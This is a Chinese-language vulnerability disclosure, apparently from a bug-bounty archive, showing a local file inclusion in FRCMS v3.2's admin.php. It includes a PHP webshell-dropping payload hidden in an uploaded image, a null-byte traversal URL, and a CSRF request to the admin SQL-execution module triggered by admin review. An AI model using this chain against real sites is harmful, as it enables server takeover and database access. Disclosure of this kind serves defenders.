### 简要描述:
宁夏刚刚地震了。。。 而我正在提交漏洞。。。
我tm是在拿生命提交漏洞啊。。。。
地震的同时我还在写过程 脑子一抽 手一哆嗦..误删了。。。强烈要求添加一个撤销操作功能
### 详细说明:
首先看 admin/admin.php 最后部分的代码
```
}else{
$mod=$_GET['m'];$act=$_GET['a'];
aPurview($mod,$act);//检测管员权限
if(file_exists(ADMIN_ROOT.'inc/'.$mod.'.inc.php')){
require_once ADMIN_ROOT.'inc/'.$mod.'.inc.php';
//$actmod=new $mod();
// if($act&&method_exists($actmod,$act)){
// $actmod->$act();
// }else{
// $actmod->index();
// }
}
$smarty->assign('menulist',ashowmenu());
$smarty->display('index.htm');
}
```
如果ADMIN_ROOT.'inc/'.$mod.'.inc.php存在则包含此文件。$mod可控。 直接截断即可
[<img src="https://images.seebug.org/upload/201504/15161138271ab931f2e9228b66e8b780b2231e20.jpg" alt="N[UP%E7[DPYU@8S5YFH]F[0.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/15161138271ab931f2e9228b66e8b780b2231e20.jpg)
包含robots.txt文件
接着 我注册一个账号 去上传图片
图片代码为
```
<?php file_put_contents("x.php","xxxxxxxxxxxxx");?>
```
这是路径/upfiles/company/file/20150415/20150415142756_455.jpg
构造如下URL
http://localhost/frcms_v3.2_GBK/uploads/admin/admin.php?m=../../upfiles/company/file/20150415/20150415142756_455.jpg%00
然后找个提交的地方 嵌入一个远程URL为以上URL 等待管理审核即可。。
我这直接在后台提交。。。
[<img src="https://images.seebug.org/upload/201504/151617541df9df9315f393d420a8dbd7cd11b922.png" alt="DPH7`3Y(ZNBC2[8}V@KZ1GE.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/151617541df9df9315f393d420a8dbd7cd11b922.png)
[<img src="https://images.seebug.org/upload/201504/151622107a639ffc43697158b4192376768fc7a0.png" alt="M`5_]RW982H4OOM%@RW6`0T.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/151622107a639ffc43697158b4192376768fc7a0.png)
```
http://localhost/frcms_v3.2_GBK/uploads/admin/admin.php?m=websys_execsql&a=doexecsql
sql=select user()&submit=+Ö´+ÐÐ+
```
无token 未验证referer
poc我也不填了。。都因为刚才手抖给删了。。说多了都是泪。
### 漏洞证明:
如上
京公网安备 11010502034610号
暂无评论